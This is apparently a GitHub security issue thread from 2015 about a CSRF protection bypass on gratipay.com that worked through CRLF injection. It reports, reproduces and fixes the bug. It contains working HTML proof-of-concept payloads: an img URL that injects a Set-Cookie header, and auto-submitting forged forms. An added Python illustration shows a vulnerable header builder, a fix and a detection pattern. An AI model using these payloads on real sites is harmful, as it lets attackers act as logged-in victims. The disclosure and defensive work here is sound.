CSRF Protection Bypass #1

Closed
chadwhitacre opened this issue Jun 16, 2015 · 8 comments

@chadwhitacre

https://gratipay.freshdesk.com/helpdesk/tickets/2305

== CSRF Protection Bypass (Chrome, Internet Explorer) ==

  1. Change name in form action to victim name
  2. Open html PoC

<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">

Result in attachment:

[screenshot at 00-10-57]

@chadwhitacre

I tried with this PoC, and was not able to reproduce his result (except when I was logged in as the target, or as an admin):

<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;">
<form action="https://gratipay.com/~lgtest/statement.json" method="POST">
    <input type="hidden" name="csrf_token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx">
    <input type="hidden" name="lang" value="en">
    <input type="input" name="content">
    <button type="submit">Submit</button>
</form>

@chadwhitacre

To: [researcher]

The first issue you reported has already been reported [https://github.com/gratipay/security-b50267/issues/1].

The second and third are new reports. I've confirmed your result for the second report [https://github.com/gratipay/security-qf35us/issues/1], and we'll be happy to add you to our Hall of Fame when we fix that bug.

I haven't yet reconstructed the HTML PoC you used for the third report. Are you able to provide that?

Thanks for the reports!

@chadwhitacre

From: [researcher]

Hi, this CSRF bypass uses CRLF Injection. (Do not forget to change the name in the form action)

<form id="csrf" action="https://gratipay.com/~fickov/statement.json" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="content" value="CSRF&#95;TEST" />
<input type="hidden" name="csrf&#95;token" value="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" />
<input type="submit" value="Submit request" />
</form>
<img src="http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;" onerror="csrf.submit()">
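
The mechanism behind the report above, as an added illustration (not code from the issue or from Gratipay/Aspen): a URL-decoded request path reflected into a response header without CR/LF filtering lets one request line become two headers, so a double-submit csrf_token cookie can be planted from an attacker-controlled page. The Location header and the example.test host are assumptions; the issue does not say which header Gratipay reflected the path into. The hardened builder rejects control characters, and a small log-scan check flags paths that would inject a Set-Cookie line.

```python
import re
from urllib.parse import unquote

# Bytes that must never appear in an HTTP header name or value.
CRLF_OR_NUL = re.compile(r"[\r\n\x00]")


class HeaderInjection(ValueError):
    """Raised when a header name or value contains CR, LF or NUL."""


def naive_headers(raw_path):
    """Vulnerable form: decodes the path and interpolates it unchecked.
    (Assumed reflection into Location; constructed for illustration.)"""
    path = unquote(raw_path)
    return f"Location: https://example.test{path}\r\n"


def header_count(serialized):
    """Number of header lines a tolerant client would see. Splitting on a
    bare CR models the browsers named in the report, which accepted %0d
    alone as a line terminator."""
    lines = re.split(r"\r\n|\r|\n", serialized)
    return len([line for line in lines if ":" in line])


def safe_header(name, value):
    """Hardened form: refuse CR, LF and NUL in either part of the header."""
    if CRLF_OR_NUL.search(name) or CRLF_OR_NUL.search(value):
        raise HeaderInjection(f"control character in header {name!r}")
    return f"{name}: {value}\r\n"


def hardened_headers(raw_path):
    """Same reflection as naive_headers, but built through safe_header."""
    path = unquote(raw_path)
    return safe_header("Location", "https://example.test" + path)


def csrf_cookie_injection_attempt(raw_path):
    """Detection rule for access logs: does the decoded path carry a line
    break followed by a Set-Cookie header?"""
    decoded = unquote(raw_path)
    return bool(re.search(r"[\r\n]\s*set-cookie\s*:", decoded, re.IGNORECASE))
```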

@chadwhitacre

Right. The point of a CSRF is to initiate an action on Gratipay for a logged-in user, when that logged-in user visits a third-party website. My PoC reconstruction was accurate, I was just not interpreting the results properly.

@chadwhitacre

To: [researcher]

Thanks, []. Bug confirmed. I'll contact you again when we've fixed it.

@chadwhitacre

Deploying gratipay/security-qf35us#2 ought to fix this.

@chadwhitacre

Confirmed fixed.

chadwhitacre added a commit to gratipay/gratipay.com that referenced this issue Jul 23, 2015

@chadwhitacre

To: researcher

The CRLF Injection and CSRF Protection Bypass bugs should be fixed now. Please confirm.

I've added you to our legacy Halls of Fame for Aspen (for the CRLF injection) and Gratipay (for the CSRF protection bypass):

http://aspen.io/security.txt
https://gratipay.com/about/security/hall-of-fame

We've now migrated our security program to HackerOne. If you would like acknowledgement on HackerOne feel free to re-file the bugs there and I will resolve them.

Thanks for the reports! :-)
